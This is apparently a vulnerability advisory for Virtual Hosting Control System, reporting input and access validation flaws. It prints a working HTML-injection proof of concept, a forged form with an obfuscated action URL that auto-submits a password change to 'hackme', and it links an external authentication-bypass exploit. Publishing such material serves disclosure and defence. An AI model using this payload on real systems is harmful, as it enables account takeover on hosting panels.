Virtual Hosting Control System Multiple Input Validation And Access Validation Vulnerabilities

Virtual Hosting Control System Multiple Input Validation And Access Validation Vulnerabilities

An exploit is not required.

The following proof of concept for the HTML injection issue is available:

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input name="pass" value="hackme"><input name="pass_rep" value="hackme"><input name="uaction" value="updt_pass"></form><script>document.dsr.submit()</script>

The following exploit for the authentication bypass is available:

http://www.rs-labs.com/exploitsntools/rs_vhcs_simple_poc.html

http://www.rs-labs.com/exploitsntools/rs_vhcs_simple_poc.html